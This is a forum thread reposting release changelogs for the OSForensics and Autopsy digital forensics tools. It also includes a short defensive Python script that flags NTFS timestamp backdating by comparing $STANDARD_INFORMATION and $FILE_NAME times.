Added unique 'Case Item ID' attribute to each case item. This ID is displayed in the 'Manage Case' window, as well as included in the generated reports. The ID is stored within the .OSFMeta file for each case item. Case Manager maintains 'Next Case Item ID' variable that gets assigned to any new items added to the case.
Fixed special characters not being escaped when generating reports

Create Index:

New indexing engine (Zoom V8 with multi-threaded offline indexing)
Much better indexing performance (3x speed increase)
Updated Create Index interface with new file type selections.
New "Memory optimization / Indexing Limits" step to bypass Pre-scan
Added support for user configurable number of indexing threads (up to 10)
Added options to enable RAM drive for temporary files
Improved RAM estimations and Indexing Limits settings
Improved indexing Status interface
Updated OSF interface to show multi-threaded indexing
Updated OSF Create Index options to offer more control with file type selection
Removed unnecessary indexing warnings
Added count display for Prescan
Added thousands grouping for large numbers shown in Create Index windows
Increased sleep/wait time while starting indexer to allow for a slower initialisation which could cause an error to be displayed
Renamed indexing process. Now using "OSFIndexer32.exe" and "OSFIndexer64.exe" instead of ZoomEngine32.exe and ZoomEngine64.exe, this should make it more obvious what is running in task manager.
Added some internal checking to clean up detached instances of OSFIndexer and temporary RAM drives.
Fixed a bug with indexing the complete content of e-mails in PST files that were text-only e-mails.
OCR (Optical Character Recognition) can now be done on photographic images while they are being indexed. Like all OCR, the results depend on the quality and resolution of the source image, how clear the text is and the level of contrast. This is only supported on Win10. Depending on the images >10 images per second are possible.

Deleted Files:

Column ordering, visibility and size now saved in OSForensics config file
Configuration options now saved in OSForensics config file
Fixed a crash caused by logging a magic number incorrectly when getting deleted files
Fixed uncaught exception error when loading MFT for some OSF devices
Fixed bug where raw whole disc carving was incorrectly returning progress, causing possible crash when accessing the list.
Added check for buffer overrun when looking for slack $I30 entries
Errors when parsing non-resident attributes of deleted MFT records no longer causes the search to terminate and throw an error message. This is an expected case. Errors are now written to the debug log and the process continues.
Fixed a crash that could occur in deleted file search when file carving is selected but the physical disk has been removed from the system
File Carver, added minimum file size option when carving. Changed "Reserved/Future Use" field in osf_filecarve.conf to "Min File Size"
File Carver, TIFF/CR2 extraction should be better.

Disk Imaging:

Added extra check if the first read fails when verifying the image created.
Previously, if the disk did not contain a valid MBR it would not show up in the list (as it would have no partitions), but the disk might have a file system boot sector. These disks are now correctly shown.
There is now the option to specify primary and/or secondary hash functions for imaging disk. So the user can select SHA1 instead of just MD5. Or calculate two hashes at the same time.

Disk Preparation:

Can now wipe BitLocked drives. Previously these drives appeared to be locked and could not be formatted.
In case of a physical drive failure, additional error codes have been added to the status window

Disk Test:

Fixed issue with formatting as FAT32 on small drives.
Fixed Crash when formatting as FAT32 fails.

E-mail Viewer:

E-mail times now include the timezone offset, both 'Delivery Time' and 'Client Submit Time'
Fixed printed e-mails missing e-mail addresses due to HTML entities not being escaped
Fixed bug where case item title set to '<Use item name>' when selecting 'Use same details for all'

File System Browser:

Added right-click menu option to jump to MFT record in the raw disk viewer
Fixed stack overflow when attempting to add device to case

File Name Search:

Added an "Uncheck all" menu item to uncheck currently selected items
Added 'Windows Shortcut Files' (i.e. .lnk files) to the file name search presets list
Column ordering, visibility and size now saved in OSForensics config file
Removed folders from results when filtering using hash set
When filtering using hash set, fixed bug with current file being added to results after cancelling search
'In hash set' flag is now set for results when hash set is used and made active
Added support for filtering by whether or not the file belongs in the hash set. This allows the user to search for files on disk that match a set of hash values
Re-arranged configuration dialog

Forensic Imaging:

Re-arranged tabs
Create Image, for physical disks, disk model and serial number are now saved in the info file
Added new 'Device and SMART Info' for displaying physical disk attributes + SMART info
Device & SMART Info, Added support for export and adding report to case
Device/SMART Info, added mouseover tooltip descriptions for SMART attributes

Forensics Copy:

Moved allocation of virtual disk image to thread to prevent system from being unresponsive

Hash Set:

Added option to create 'Quick hash set', allowing the user to quickly create a hash set by specifying a list of hashes
Fixed deleted hash set databases appearing in the file name search config drop down box
Re-organised buttons in main window
Added functionality for importing Project VIC JSON files with MD5 hashes & optimised the import load time.
Added default database name when importing VIC data set
Stopped navigation bar being disabled when importing hash set. User can now do other tasks in parallel to importing a large hash set.
Fixed hash set operation LED still "active" when there's an error
Fixed number display and file size formatting to be more readable for large import files (> 4GB)
When creating hash set databases, columns are no longer created for hashes that don't exist (e.g. VIC/NSRL datasets)

Hash set lookup:

Added right click menu option to open files in internal viewer
Fixed incorrect # files hashed text due to not updating the dialog once all files are hashed
When performing hash set lookups, hashes are no longer checked for columns that do not exist. This reduces the query time for large hash sets. e.g. we don't check for SHA1 matches if the particular hash set doesn't have SHA1 values. Results were a significant speed up for hash lookups.
When performing single file hash lookups, filename matches are no longer queried. This reduces the query time for large hash sets.

Install and run from USB:

Added help link
Added separate "temp build" directory field when using WinPEBuilder.
Updated WinPE builder to deal with new latest WinPE10 changes

Internal File Viewer:

EFS support (encrypted file system). When an EFS file is now opened in the file viewer, a temp copy will be created and passed to the hex and text viewer. If the matching certificate has been installed on the system, the text should appear decrypted.
Hex View, added right-click option to add selected strings to case (as HTML file)
Fixed potential mem leak when generating video thumbnails
Fixed potential concurrency issues when loading videos
Added OCR view (Win10 only)

Memory viewer:

Column ordering, visibility and size now saved in OSForensics config file
Added button to add memory dump to case
Removed 'Error' text and icon from message box when process memory cannot be dumped because of access restrictions
Updated version of Volatility Workbench, with Mac & Linux support and ability to add your own profiles.

Mismatch File Search:

Fixed a bug with the CSV export dialog displaying a .HTML file extension instead of .CSV

NSRL Hash Import:

Import 9x faster. While importing repeated file hashes, checks for duplicates are no longer done using a lookup on a non-indexed database (very slow). Now checks are done by comparing the product code between two consecutive lines in the input file.
Import will create new database automatically with default name based on date and time. Thus, incremental import is no longer an option.
New NSRL import config window to specify input and (temp) output folders
Temp Output folder can be specified so that user can specify RAM drive or SSD to speed up the import. Database is then moved from temp location to default hash sets location.
Updated help file with info about allocating enough space on a RAM drive.
Status now displays percentage counter during file importing

Password Recovery:

Added tab to allow PFX certificates to be installed on the local system, to facilitate opening EFS encrypted files when the certificate and password are available
Column ordering, visibility and size now saved in OSForensics config file
Browser passwords, made some changes to Firefox login recovery, now has a 64-bit and 32-bit helper executable (as Firefox has started distributing as 64-bit).
Registry passwords, now displaying password hint value next to 'NT Password' column. Displays '(empty)' if not present.
Registry Passwords, added support for Win10 Anniversary Update for live system in Forensics mode
Removed a "File not found" error when running the windows password search on a non system drive

Prefetch Viewer:

Added right-click option to export selected items to CSV

Rainbow Tables:

Fixed crash occurring when cracking hashes from a pwdump txt file - wrong data types were being passed to the format string when the secure case logger was enabled

Raw Disk Viewer:

Added progress window when carving to file
Renamed 'Decode' window to 'Disk Info'
Renamed 'Data Interpreter' window to 'Data Decode', split windows and shuffled content between the decode windows.
Added right-click menu options to 'Data Decode' window, Jump to File and Jump to File Record.
Clicking on file paths now opens the internal viewer
Clicking on LCN/offsets now jumps to the offset in the raw disk viewer
Data Interpreter window now shows the MFT record number and filepath if the current cursor position is inside the $MFT file
Fixed crash issue when sector size could not be determined
Fixed right-click "Jump to offset" not working some of the time
Hexadecimal addresses copied from the Windows calculator into the search box didn't work. The calculator was inserting non printable characters into the string. Non printable characters are now being removed.

Recent Activity:

Added a quick filter option (text box and button) to quickly apply a text filter to recent activity items
"Show empty activity types" checkbox now defaults to on so empty types are displayed
Results are now sorted by Date (desc order) by default
Fixed possible crash when reading jumplist info
Added function to collect new Win10 Timeline database for artifacts
Added more displayed information for windows event items.

Registry Viewer:

Support for generating reports for known registry hives (currently only SOFTWARE hive at the moment)
Fixed a possible crash when processing a registry file

SQLite Browser:

Will check for Skype SQLite database files during "Scan for DB Files".
Resizeable Dialog/Controls
Option (enabled by default) to convert known timestamps to readable format
Scan Folder button is now more useful. Will now populate with locations of known SQLite files (e.g. Chrome and Firefox profile directories)
Scan Folder button will scan for known Android user data directory (where apps usually store their own data) on currently selected drive

System Information:

A new tab is now created for every new system information command
Added option to restore command lists back to default
Added "Recovery of Bitlocker Keys" to command list
Added ability to assign a name to an entered command. This name will then be displayed in the output/report.
Added support for Embedded Python 3.6.5
Removed the "Get" from the start of some item names.
Changed button text from 'Add...' to 'New...' when adding new commands
Moved 'Reset lists to default' option to dialog window. Added confirmation prompt to prevent accidental press.
Replaced spin control for moving items up/down due to overriding the handling of mouse wheel messages
Re-organized controls
Added command to get current clipboard contents
Added command to get anti malware (windows defender) software status
Added command to get current TPM status
Started encoding HTML special entities in output from tools so anything with HTML characters will display correctly
Fixed possible crash when getting printer info and the system returns bad information.

Triage Wizard (now renamed to Auto-Triage):

Changed Wizard icon to fingerprint icon & removed forensics dude. R.I.P. forensics dude, we loved you, but the world just wasn't ready for you.
Added option to create logical image with known system files
Added agent help text when mouse is hovering over a control
Added a free disk space check (for at least 1GB + memory size if memory dump selected)
Fixed an unhandled exception that could occur in the triage wizard when running a scan on a non-system drive (e.g. D) with only Windows passwords selected.
Fixed a missing file error message that was displayed when running a scan on a non-system drive (e.g. D) with only Windows passwords selected and 0 results were found
Fixed a crash caused by trial limitations when running the triage wizard

Web Browser:

Added status bar to browser.
Can now select export format as Web Archive Format (.mht) when exporting webpage.
Can now export linked PDF, ZIP and other files. Also added check boxes to allow user to select what is downloaded.
There is an option to download videos (MP4 format) from sites such as YouTube and add them to the case.
Added a progress indicator for downloading large files.

Misc:

Added colour coding of encrypted files displayed in a file list
Added exit confirmation message
Added warning message on OSF shutdown whenever the USB write-protect settings are changed during the course of execution
Fixed a long delay at startup when not running as Admin
Removed agent icon from feature description text on start window
After successfully saving a file to disk, fixed a bug with activity monitor displaying task is still active
Changed how temp files are stored, each thread now has a temp folder
Increased a timeout (from 60 seconds to 180 seconds) when trying to repair esedb databases with esentutl, as it was timing out during triage runs
To prevent machine from sleeping when running from USB, the mouse will jiggle if the time between user input (i.e. keyboard or mouse input) surpasses 10 secs.
Added DLL (MSVCR120.dll) required by wkhtmltopdf.exe to installer (error seen on windows )
Switched debug logging to logging library g3log for thread-safe, crash-safe, faster logging

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1001
Beitrag von: SiLæncer am 25 Juni, 2018, 17:00
What's new:

Build 1001 was made shortly after build 1000 to fix a day 1 indexing bug

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1002
Beitrag von: SiLæncer am 06 Juli, 2018, 18:00
Changelog

Case Manager
Reduced memory usage of path flags structure
Case logging now enabled by Default
Create Index
Fixed memory (handle) leak in Win10 caused by bug in ShellExecuteEx() in certain builds of Win10. Replaced with CreateProcess() calls.
Improved error messages regarding "Maximum file size limit exceeded..." to show file size.
Improved various error messages to show both actual temp file path and file being indexed
Fixed bug with Pre-Scan count displayed being much bigger than the actual count used. Did not affect pre-scan result.
Minor changes to fix "(Win10 only)" text for the "Use OCR" checkbox appearing in Win10 builds
Improved accuracy of URLs being reported in the Create Index Status
Deleted Files
Added sort By FG and BG color.
File Name Search
Improved performance by doing fewer string compares/copies if wildcard '*' is used
Hash Set
Added a "skip files smaller than" option when creating a new hash set to avoid creating hash sets which match the large amount of small byte files on a system
Image Viewer
Initial Support for Non Password protected logical Android Backup files (.ab) allowing Image Viewer to be able to browse contents of Android Backup Files (.ab).
Internal Viewer
Added BitLocker Recovery Key RegEx pattern to Filter Presets for Hex File Viewer

http://www.osforensics.com/
Titel: OSForensics 6.0.1003
Beitrag von: SiLæncer am 10 Juli, 2018, 09:17
What's new:

Create Index: Added RAM check before proceeding with user specified Create Index Size Settings. Without this, users may have proceeded with size settings that led to exhausting their RAM and the indexer crashing.
Search Index: Fixed bug when searching index containing file types: binary files, recycle bin meta, or email attachments.

http://www.osforensics.com/
Titel: OSForensics 6.0 Build 1004
Beitrag von: SiLæncer am 17 Juli, 2018, 09:12
Changelog

Create Index:

Fixed out of bounds exception
New indexer build to address issues with multi-threaded indexing from ext2 image (and possibly other filesystems)

Volatility Workbench:

Fixed issue with edit boxes.

Misc:

Fixed a bug preventing the workflow from being customised correctly

http://www.osforensics.com/
Titel: Autopsy 4.8.0
Beitrag von: SiLæncer am 09 August, 2018, 06:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

New Features:

Data Source Grouping:

The case tree view can now be grouped by data source.
Keyword and file search can now be restricted to a data source.

Central Repository / Correlation:

New common files search feature that finds files that exist in multiple devices in the same case.
The Other Occurrences content viewer now shows matches in the current case (in addition to central repository).
Central repository options panel now shows cases that are in repo.
A comment about a file can be created and saved in the central repository so that future cases and see it.

Keyword Search:

Can enable OCR text extraction of PDF and JPG files using Tesseract.
Keyword search module normalizes Unicode text.
Keyword search module uses ICU to convert text files that do not have a BOM.

Tagging:

Tagging menu changed to have user defined tags at top and "quick tag" removed one level of menus.
New "Replace Tag" feature to change the tag on an item.

Other:

SQLite tables can be now be exported to CSV files.
An interesting file artifact is now created when a "zip bomb" is detected.
An object detection ingest module was added to the Experimental module. It requires an OpenCV trained model.

Bug Fixes:

Expanding the case tree is more efficient.
Improved "zip bomb" detection.
Assorted small bug fixes are included.

http://www.sleuthkit.org/autopsy
Titel: OSForensics 6.1 Beta 8
Beitrag von: SiLæncer am 12 September, 2018, 20:00
Changelog

Changes since 6.1 beta 7

File system support
- Several fixes for APFS support in OSF modules
- Support for compressed files (zlib & lzvn) in APFS

Mobile Artifacts / Android Artifacts
- Renamed "Mobile Artifacts" to "Android Artifacts" to reflect current ability of module (iOS is not currently supported).

Raw Disk Viewer
- Regular expression searching, made a change to prevent an infinite loop when a partial match was found

SQLite Browser
- Fixed bug that prevented additional sqlite viewers to be open even after closing opened sqlite viewers.
- Fixed bug with "View Cell with internal viewer" returning "Not an Error" message.

Start/Navigation
- File and Hex Viewer, will now open File Preview Tab as default.

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1000
Beitrag von: SiLæncer am 27 September, 2018, 12:24
Changelog

Case Manager:
New feature: Paste Clipboard to Case. Can now add external BITMAP (e.g. screenshots) and Copy/Paste Text to case. This provides an additional method of capturing web pages.
Added support for mounting an image file as a "group" device. Partitions are listed as a folder of the top device.
When displaying the volume shadow info to add to case, the creation time now includes the GMT offset
Create Index:
Updates to handle indexing Apple's APFS file system (indexing encrypted volumes is not supported, but coming soon).
Fixed multi-threaded indexing problems with some image filesystems such as EXT2
Improved memory estimation (was previously not including some offline buffers)
New "broad numeric matching" feature. Allows for better searching of currency values and part numbers with hashes in the number.
Added Precognitive Search feature, return matches for trigger keywords during the "Create Index" process. So you don't need to wait for the indexing process to be completed before seeing the search results. It is also possible to use pre-made word lists with the Precog search.
The concept of a template has been removed, instead you can now save and load previously used configurations. Some of the advanced template options, like extreme binary string extraction and stemming are now on Step 2 of the create index process.
Deleted Files:
Fixed NTFS MFT record size calculation, which can prevent parsing of the MFT in the raw disk viewer and in deleted files module.
Partial support for scanning "group" devices for deleted files
Fixed buffer overrun crash when parsing slack space for $I30 record
Email Viewer:
Single Email Viewer can view Gmail email stored within Android mailstore.username@gmail.com.db.
File Name Search:
Fixed a bug when searching for deleted files
File System Browser:
Fixed crash with internal viewer when clicking prev/next after file system browser is closed
File system support:
Apple's APFS file system is now supported. Including support for compression (zlib & lzvn) and encryption. So you can browse and search files from a Mac machine in Windows.
Forensic Imaging:
Made some changes to how Encase format images (.E01 and .Ex01) are created to work around an issue that limited the final image creation to a maximum of 64 .E01/.Ex01 files, which resulted in images larger than 100GB in size and more than 64 files being unreadable.
Added copy Logical Android Image. Will obtain files off Android device using 'adb pull' command over a USB connection. To use this with a device connected over USB, you must enable USB debugging in the Android device system settings, under Developer options. So the device needs to be unlocked to do this.
Fixed image type not displaying correctly for unicode filenames
Hash lookup:
Fixed hang when error occurs while attempting to read from deleted files
Install to USB:
Updated WinPEBuilder used for self boot USB, added option under Program Tab to allow selection of Storage Area Network (SAN) Policy. The recommended setting for OSForensics is, 3 - Doesn't mount storage devices, to prevent introduction of artifacts. However, if you need access to disks, e.g. external disk drive to image to, you can change it accordingly
Internal Viewers:
Started saving viewer x,y positions (previously was just size) in config file and will restore them to the last position on next open
Internal Viewer - File Info
When viewing compressed archives (e.g. .7z or .ab), added right-click option to save file to disk.
Show the total/used/free space for "partition" folders. Show the disk size for devices/partitions
Fixed multithreading issues with sharing a handle to a video file. This potentially can cause a crash.
Added checkbox to link the selected file in the list (file name search, mismatch search, etc...), and the current file in the internal viewer. This allows for faster selecting and previewing of pictures.
Android Artifacts:
Addition of new module to scan for android mobile device information. A limited number of artifacts are supported in this release. Additional data will be extracted in future releases.
Currently only supports Android disk image (looks for items in data folder) and/or backup (apps folder)
Initial support for password encrypted android backups. When opening file in FileViewer, OSF will prompt for password and attempt to decrypt the backup.
Password Recovery:
Fixed crash when running windows login / password search simultaneously due to shared global variable
Fixed bug with list view column widths not being saved correctly, could cause URL column to be incorrectly hidden and column widths to be reset each time OSF was started.
Now displays available dictionaries before file is selected, will display an info message when a 40bit encrypted file is selected (which doesn't use the dictionaries).
Added a "Add Dictionary" button that will copy a selected text file to the OSF dictionaries folder and create a simple default definition file to use the dictionary
Renamed folder where pre-installed and user dictionaries are stored (from PDF to Dictionaries)
Raw disk viewer:
Regular expression searching, made a change to prevent an infinite loop when a partial match was found
Added clickable link for File Rec#
Fixed bug with jumping to an LBA from the MBR/GPT
Added option to jump to MFT record
Added decoding of $FILE_NAME attribute
Added decoding of NTFS attribute common header
Added support for parsing MFT attributes SECURITY_DESCRIPTOR, OBJECT_ID, VOLUME_NAME, VOLUME_INFORMATION, INDEX_ROOT
APFS GPT partition GUID now detected and displayed in Data Decode window
APFS file system string now properly displayed in Disk Info window
Fixed excessive quotes for 'Context' field in exported CSV
Replace unprintable characters with '.' when displaying context
Recent Activity:
Now collects more information from LNK files (Windows Explorer - Recent Items) such as volume name, volume serial and link target create/access/modified dates
Fixed a bug where subitem counts in the treeview were not actively reflecting the actual filtered counts.
Made a change so windows timeline entries always display the same amount of lines in the file list tab for consistency
Report Templates:
Updated report templates to include Mobile Artifacts
SQLite Browser
Changed SQLite Browser into a viewer so users can have multiple instances open (Up to 10).
Fixed bug that prevented additional sqlite viewers to be open even after closing opened sqlite viewers.
Fixed bug with "View Cell with internal viewer" returning "Not an Error" message.
Start/Navigation:
Added "Add to case" action on start screen and left hand menu button to allow quick access to add a device to a case
File and Hex Viewer, will now open File Preview Tab as default.
Reordered the left side buttons. Removed Android Artifact and About button from the Navigation Menu, but still accessible from the Start page. User Workflow configuration setting will reset to defaults with changes upon first starting V6.1.1000
System Information:
Added new commands to get Windows information (product name, build and install date) and last shutdown time from the registry
Fixed crash bug due to buffer overflow with long case device names. Device names over 12 characters caused problems in the system information module
UsnJrnl Viewer
Fixed incorrect filenames due to incorrect length truncation
Web Browser:
Export Webpage Dialog can be resized vertically to fit smaller screens.
Misc:
Added support for mounting "group" devices such as entire physical disks. Contained partitions are mounted as "subdevices" and appear as folders under the parent device
Changed timezone drop down for GMT/UTC 0 from "GMT +0:00" to "GMT 0:00" to visually stand out more in list
Made some changes so that the logo and version text on the main start page are now next to the help / mouse over text area to save some vertical space

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1001
Beitrag von: SiLæncer am 09 Oktober, 2018, 12:24
Changelog

Raw disk viewer:

Added right-click menu to export/add decoded master file table (MFT) to case

Internal viewer:

An error message is now shown when there is not enough memory to extract strings. Previously it would silently stop the extraction process in a low memory situation.
Added "File load in progress" status text when loading large text files
Fixed slow load when attempting to open a large file in the File Viewer tab

File system browser:

Added new columns for NTFS $FILE_NAME dates. Added checkbox under Tools->Options to show/hide $FILE_NAME dates. So up to 8 dates per file are now displayed. This is useful for detecting fake time stamps.

File Name Search:

Files found in file name search can now be added to a logical image (VHD) via check boxes and right click options. This provides a fast method to, for example, dump all JPG files to a logical image.

Create Index:

Updates to handle indexing Apple's APFS file system - now with support for encrypted volumes.
Bug fix - PST EMails with long headers didn't get all the text in the header indexed. This was a regression, but is now fixed
Thread status now updates more often when indexing inside containers (like Zip files). So progress is more obvious and the indexer doesn't appear to be stuck on large container files.
Improved handling for hidden $ system files, like $BadClus, $Extend when indexing.

Misc:

It is now possible to export timeline graph to a PNG image file or copy to clipboard via right click on the graph.

http://www.osforensics.com/
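The $FILE_NAME columns described in the Build 1001 notes are useful because the four $STANDARD_INFORMATION timestamps can be set by any process through SetFileTime, while the four $FILE_NAME timestamps are written only by the kernel. The following Python script is an added example for this thread, not OSForensics code: it takes the eight timestamps as FILETIME integers (the layout the notes describe, exported by hand here) and applies the two classic timestomping indicators, $SI earlier than $FN created, and $SI values with an all-zero sub-second part. Field names and both sample records are constructed.

```python
from datetime import datetime, timedelta, timezone

# Added example, not OSForensics code. Sample records below are constructed.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # FILETIME counts 100 ns ticks
TS_FIELDS = ("created", "modified", "mft_modified", "accessed")


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a 64-bit FILETIME to an aware UTC datetime (100 ns truncated to 1 us)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime, extra_ticks: int = 0) -> int:
    """Inverse of filetime_to_datetime; extra_ticks supplies a sub-microsecond part."""
    delta = dt - FILETIME_EPOCH
    micro = (delta.days * 86_400 + delta.seconds) * 1_000_000 + delta.microseconds
    return micro * 10 + extra_ticks


def check_timestamps(si: dict, fn: dict) -> list:
    """Return anomaly strings for one file; si/fn map TS_FIELDS to FILETIME ints.

    1. $SI created or modified earlier than $FN created: $FN created is set by the
       kernel when the file appears in its directory and is not reachable through
       SetFileTime, so a $SI time before it is not produced by normal use.
    2. $SI values with a zero sub-second part: tools that pass whole seconds to
       SetFileTime leave 0 ticks, while kernel-written times almost never do.
    """
    findings = []
    fn_created = fn["created"]
    for field in ("created", "modified"):
        if si[field] < fn_created:
            findings.append(
                f"$SI {field} {filetime_to_datetime(si[field]).isoformat()} "
                f"predates $FN created {filetime_to_datetime(fn_created).isoformat()}"
            )
    for field in TS_FIELDS:
        if si[field] % TICKS_PER_SECOND == 0:
            findings.append(f"$SI {field} has a zero sub-second component")
    return findings


def _ts(y, m, d, hh=0, mm=0, ss=0, ticks=0):
    """Build a FILETIME for a UTC wall-clock time plus optional 100 ns ticks."""
    return datetime_to_filetime(datetime(y, m, d, hh, mm, ss, tzinfo=timezone.utc), ticks)


# Constructed sample 1: a file created and later edited normally. $FN dates stay at
# creation; $SI moves forward with real clock values that carry sub-second ticks.
NORMAL_FILE = {
    "si": {"created": _ts(2018, 9, 1, 10, 0, 0, 1_234_567) + 50_000,
           "modified": _ts(2018, 9, 5, 8, 30, 0, 7_654_321),
           "mft_modified": _ts(2018, 9, 5, 8, 30, 0, 7_654_321),
           "accessed": _ts(2018, 9, 5, 8, 30, 0, 7_654_321)},
    "fn": {f: _ts(2018, 9, 1, 10, 0, 0, 1_234_567) for f in TS_FIELDS},
}

# Constructed sample 2: the same file after its $SI times were set back to a round
# 2015 date. $FN created still carries the real 2018 creation time.
BACKDATED_FILE = {
    "si": {"created": _ts(2015, 1, 1),
           "modified": _ts(2015, 1, 1),
           "mft_modified": _ts(2018, 9, 10, 12, 0, 0, 5_000_000),
           "accessed": _ts(2015, 1, 1)},
    "fn": NORMAL_FILE["fn"],
}


def triage(files: dict) -> dict:
    """Run check_timestamps over {name: {"si": ..., "fn": ...}}; keep files with findings."""
    result = {}
    for name, rec in files.items():
        findings = check_timestamps(rec["si"], rec["fn"])
        if findings:
            result[name] = findings
    return result


if __name__ == "__main__":
    for name, findings in triage({"normal.docx": NORMAL_FILE,
                                  "backdated.docx": BACKDATED_FILE}).items():
        print(name)
        for line in findings:
            print("  -", line)
```

The sub-second check is the weaker of the two: files copied from FAT media or extracted from ZIP archives legitimately carry whole-second or two-second times, so treat that finding as a prompt to look at the $FN dates and the USN journal rather than as proof on its own.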
Titel: OSForensics 6.1.1002
Beitrag von: SiLæncer am 16 Oktober, 2018, 09:15
Changelog

Create Index: Fixed bug with indexing BitLocker encrypted drive
Disk Test: GUI High DPI Scaling issue fixes (when user sets Application High DPI Override)
Forensic Imaging – Logical: Removed CREATE_VIRTUAL_DISK_FLAG_FULL_PHYSICAL_ALLOCATION flag when creating virtual disk file. Pre-allocating disk space may cause the system to stall especially for large disk images.
Fixed progress bar shifting backwards after a file copy is complete
Recent activity: Changed file list output of Windows explorer – recent items type so it no longer overlaps the next entry
Fixed a bug where the vertical scrollbar was not refreshed correctly when switching between the file details and file list tabs
Added location of "Windows Event Log" for windows event items retrieved from a live scan
Timeline: Restored 'Show these files' option in right-click menu
WinPEBuilder: Updated to V1.2.105, fixed issue where the build process would fail if there was a space in the Temp work directory.

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1003
Beitrag von: SiLæncer am 26 Oktober, 2018, 12:31
Changelog

Auto triage:

Fixed a crash that could occur when collecting recent activity items

Case management:

Added debug output when attempting to load a bitlocker encrypted drive
Fixed a scaling issue with the generate report dialog not displaying correctly when high DPI scaling override settings were in use

Recent activity:

Fixed a crash that could occur when collecting Opera form history
Fixed a crash that could occur when collecting USB information in windows 7 for live acquisition
Fixed a bug where filters weren't applying correctly to URL history and downloads.

Misc:

Added support for newer versions of BitLocker. XTS-AES 128 support was added. This became available in Windows 10 (build 1511)

http://www.osforensics.com/
Titel: Autopsy 4.9.1
Beitrag von: SiLæncer am 10 November, 2018, 11:00
Changelog

Bug Fixes:

Fixed possible ingest deadlock from Image Gallery database inserts.
Image Gallery does not need lock on Case DB during pre-population, which makes UI more responsive.
Other misc Image Gallery fixes.

http://www.sleuthkit.org/autopsy
Titel: OSForensics 6.1 Build 1004
Beitrag von: SiLæncer am 13 November, 2018, 12:16
Changelog

Android Artifacts:

Fixed possible crash when scrolling through messages. Message scrolling in general should be smoother.
Pictures from MMS Messages (acquired through Android Extract App) now visible in preview window of MMS Tab.
Updated to include data from call log and contacts.

Auto Triage:

Made auto triage tooltips a bit smaller to better fit buttons on dialog

Create index:

Fixed bug for Create Index Status GUI (unable to click "Save configuration" button) with high DPI setting
Fixed support for Win10 Bitlocker encryption

Raw disk viewer:

Fixed default case drive not being displayed after switching cases

Misc:

Fixed bug where "Entry Point Not Found : The procedure entry point CancelSynchronousIo could not be located in the dynamic link library KERNEL32.dll" could be displayed on old versions of Windows (pre Vista)

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1005
Beitrag von: SiLæncer am 28 November, 2018, 09:11
Changelog

Android Artifacts:

Fixed bug with incorrectly listing call type (e.g. Incoming, Missed, etc..)
Combined/Cleaned up contacts list. Contacts with same RawContactId are combined into a single listing (previously there was one entry per email, per phone, etc)
Updated OSFExtract Android App to V1.0.1002

File Name Search:

Fixed a crash that could occur during a search if none of the file details columns were enabled

Misc:

Added some sanity checks to the customised column config file save/reload to prevent situations where all the columns are hidden
Updated help file for Android Artifact and OSFExtract Android App

http://www.osforensics.com/
Titel: Autopsy 4.10.0
Beitrag von: SiLæncer am 16 Januar, 2019, 17:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

New Features:

Central Repository
Case Manager shows data source details
SSID, MAC address, IMEI, IMSI, and ICCID can be stored and correlated on
SSID, MAC address, IMEI, IMSI, and ICCID values from past cases are flagged if they are seen again in the current case.
File types can be specified when searching for common files with past cases.
Results from finding common files with past cases are now organized by case instead of by number of occurrences.
The Central Repository can now be searched for a specific value (hash, email, etc.)

The E01 Verifier ingest module was renamed to Data Source Integrity module and it will:

Calculate hashes if none exist for a non-E01 data source
Validate hashes if they are defined
MD5, SHA1, or SHA256 hash values of raw data sources can now be specified when they are added.
Added the ability for examiners to select the time zone for displaying dates.
Tesseract OCR text extraction for keyword search now supports languages other than English, if language packs are installed.
Custom headers and footers can now be added to HTML reports.
New report module to export basic file data in CASE/UCO format.
Ingest filter rules (for triage) can now specify a list of extensions (such as "jpg,jpeg,png") instead of needing to make a rule for each extension.

Image Gallery:

Refactored to ensure database was fully closed when case was closed.
No longer pre-populate DrawableDB database.
Added caching to reduce time required to insert files after analysis.

Bug Fixes:

Duplicate interesting item and EXIF metadata artifacts are no longer created when you run the modules that generate them more than once.
The Application content viewer now displays SQLite table column names even when the table is empty.
Assorted small bug fixes are included.

http://www.sleuthkit.org/autopsy
Titel: Autopsy 4.11.0
Beitrag von: SiLæncer am 29 April, 2019, 12:22
Changelog

New Features:

Adding Data:

Hashes can optionally be entered when adding a disk image data source to a case.
Acquisition details can be stored when the data source is added.

Ingest Modules:

Added support for Microsoft Edge browser (cookies, history, and bookmarks)
Added support for Safari web browser (downloads, cookies, history, and bookmarks)
Expanded Chrome browser support to include cache parsing and form/auto fill.
Expanded Firefox browser support to extract form/auto fill fields.
Parse Zone.Identifier files to identify the source of files.
Added a TSK_SOURCE artifact to downloaded files to help users trace back to where it came from.
Added support for parsing vCards (virtual cards).
Extract more information about Windows user accounts (number of logins, creation date, and last login)
Detect more operating system types, which get saved as a TSK_OS_INFO artifact.
Detect Android media cards, which gets saved as a TSK_DATA_SOURCE_USAGE artifact.

UI:

The Application content viewer now displays HTML files.
Video playback now uses gstreamer on 64-bit systems, which supports more video formats.
Pictures can be rotated and zoomed in the Application content viewer.
The Other Occurrences content viewer layout was reorganized to make viewing the data easier.
New "Data Source Summary" panel shows high-level statistics and details about the data sources in the case.
Data sources are now listed in the data sources tree in alphabetical order.
The presentation of finding common properties within a case was revised to group results in a more helpful way.

Report / Export:

Portable Cases can be created based on tagged data. These cases contain a subset of the case data and can be opened anywhere.
Users can now choose tabs or commas as the delimiter for a files report.
